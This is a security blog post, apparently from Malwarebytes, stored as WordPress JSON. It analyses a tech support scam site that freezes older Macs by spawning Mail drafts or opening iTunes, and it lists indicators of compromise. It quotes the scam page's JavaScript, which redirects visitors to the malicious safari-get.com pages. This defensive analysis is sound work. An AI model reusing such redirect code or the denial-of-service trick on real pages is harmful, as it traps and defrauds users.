{"id":5871,"date":"2017-01-18T22:53:20","date_gmt":"2017-01-18T22:53:20","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/01\/18\/news-76\/"},"modified":"2017-01-18T22:53:20","modified_gmt":"2017-01-18T22:53:20","slug":"news-76","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/01\/18\/news-76\/","title":{"rendered":"Tech support scam page triggers denial-of-service attack on Macs"},"content":{"rendered":"<p>Tech support scammers have been using various themes to push\u00a0fake alerts to scare users into calling for assistance. These fall into the &#8216;browlock&#8217; category if they are via the browser and into the screen lockers category if they\u00a0are actual malware that runs on the system.<\/p>\n<p>Recently, there has been a trend for scammers to cause denial-of-service attacks against people&#8217;s computers. We <a href=\"https:\/\/blog.malwarebytes.com\/cybercrime\/social-engineering-cybercrime\/2016\/11\/tech-support-scammers-abuse-bug-in-html5-feature-to-freeze-computers\/\" target=\"_blank\">documented<\/a> it in early November with a specific HTML5 API (<em>history.pushState<\/em>) which caused the browser to freeze. Today we take a quick look at yet another technique that targets Mac OS users running Safari.<\/p>\n<p>A newly registered scam website targeting Mac users was <a href=\"https:\/\/twitter.com\/jeromesegura\/status\/812776441234395137\" target=\"_blank\">making the rounds late last year<\/a>. Simply visiting the malicious site on an older version of MacOS would\u00a0start creating a series of email drafts, which eventually cause the machine to run out of memory and freeze.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-15827\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2016\/12\/emailclient.png\" alt=\"emailclient\" width=\"1292\" height=\"904\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2016\/12\/emailclient.png 1292w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2016\/12\/emailclient-300x210.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2016\/12\/emailclient-600x420.png 600w\" sizes=\"auto, (max-width: 1292px) 100vw, 1292px\" \/><\/p>\n<p>The malicious webpage will first determine the version of OS X via a user agent check and push two different versions of this denial-of-service (10 or 11):<\/p>\n<pre>if ((navigator.userAgent.match(\/OS 10.1.1\/i))) {   location.replace(\"http:\/\/safari-get.com\/11.php\");  }  else if ((navigator.userAgent.match(\/OS 10.2\/i))) {   location.replace(\"http:\/\/safari-get.com\/11.php\");  }else  {  location.replace(\"http:\/\/safari-get.com\/10.html\");}<\/pre>\n<p>The first variant\u00a0(<em>10.html<\/em>) has\u00a0code that will keep drafting emails (but does not actually send them) incrementally and cover the previous open windows.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-15829\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2016\/12\/code.png\" alt=\"code\" width=\"565\" height=\"629\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2016\/12\/code.png 565w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2016\/12\/code-269x300.png 269w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2016\/12\/code-539x600.png 539w\" sizes=\"auto, (max-width: 565px) 100vw, 565px\" \/><\/p>\n<p>The second variant (<em>11.php<\/em>) will instead open up iTunes:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-15898\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/01\/itunes.png\" alt=\"itunes\" width=\"584\" height=\"474\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/01\/itunes.png 584w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/01\/itunes-300x243.png 300w\" sizes=\"auto, (max-width: 584px) 100vw, 584px\" \/><\/p>\n<p>These flaws may have been fixed with\u00a0<a href=\"https:\/\/support.apple.com\/en-ca\/HT201222\" target=\"_blank\">macOS Sierra 10.12.2<\/a> as Mac users running a fully up-to-date OS do not seem\u00a0to be affected by\u00a0the Mail app DoS:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-15828\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2016\/12\/blocked-1.png\" alt=\"blocked\" width=\"986\" height=\"576\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2016\/12\/blocked-1.png 986w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2016\/12\/blocked-1-300x175.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2016\/12\/blocked-1-600x351.png 600w\" sizes=\"auto, (max-width: 986px) 100vw, 986px\" \/><\/p>\n<p>However, the second variant appears to\u00a0still be capable of opening up iTunes, without any prompt in Safari:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-15899\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/01\/launched.png\" alt=\"launched\" width=\"497\" height=\"416\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/01\/launched.png 497w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/01\/launched-300x251.png 300w\" sizes=\"auto, (max-width: 497px) 100vw, 497px\" \/><\/p>\n<p>Thanks to\u00a0<a href=\"https:\/\/twitter.com\/TheWack0lian\" target=\"_blank\">@TheWack0lian<\/a> for pinging me back about this scam site and its DoS feature.<\/p>\n<p><span style=\"text-decoration: underline\"><strong>IOCs:<\/strong><\/span><\/p>\n<ul>\n<li>safari-get[.]com<\/li>\n<li>safari-get[.]net<\/li>\n<li>dean.jones9875@gmail.com<\/li>\n<li>safari-serverhost[.]com<\/li>\n<li>safari-serverhost[.]net<\/li>\n<li>amannn.2917@gmail.com<\/li>\n<\/ul>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/101\/mac-the-basics\/2017\/01\/tech-support-scam-page-attempts-denial-of-service-via-mail-app\/\" target=\"bwo\" >https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<table cellpadding='10'>\n<tr>\n<td valign='top' align='center'><a href='https:\/\/blog.malwarebytes.com\/101\/mac-the-basics\/2017\/01\/tech-support-scam-page-attempts-denial-of-service-via-mail-app\/' title='Tech support scam page triggers denial-of-service attack on Macs'><img src='https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2016\/12\/webpage.png' border='0'  width='300px'  \/><\/a><\/td>\n<\/tr>\n<tr>\n<td valign='top' align='left'>Tech support scammers are up to dirty tricks again, trying to cause your computer to freeze by simply visiting a webpage.<\/p>\n<p>Categories: <\/p>\n<ul class=\"post-categories\">\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/101\/mac-the-basics\/\" rel=\"category tag\">Mac<\/a><\/li>\n<\/ul>\n<p>Tags: <a href=\"https:\/\/blog.malwarebytes.com\/tag\/browser-alert\/\" rel=\"tag\">browser alert<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/mac\/\" rel=\"tag\">mac<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/mac-os\/\" rel=\"tag\">Mac OS<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/malware\/\" rel=\"tag\">malware<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/safari\/\" rel=\"tag\">safari<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/tech-support\/\" rel=\"tag\">tech support<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/tech-support-scam\/\" rel=\"tag\">tech support scam<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/tss\/\" rel=\"tag\">TSS<\/a><\/p>\n<table width='100%'>\n<tr>\n<td align=right>\n<p><b>(<a href='https:\/\/blog.malwarebytes.com\/101\/mac-the-basics\/2017\/01\/tech-support-scam-page-attempts-denial-of-service-via-mail-app\/' title='Tech support scam page triggers denial-of-service attack on Macs'>Read more&#8230;<\/a>)<\/b><\/p>\n<\/td>\n<\/tr>\n<\/table>\n<\/td>\n<\/tr>\n<\/table>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[10541,10454,10542,3764,10543,10536,10544,10545],"class_list":["post-5871","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-browser-alert","tag-mac","tag-mac-os","tag-malware","tag-safari","tag-tech-support","tag-tech-support-scam","tag-tss"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/5871","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=5871"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/5871\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=5871"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=5871"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=5871"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}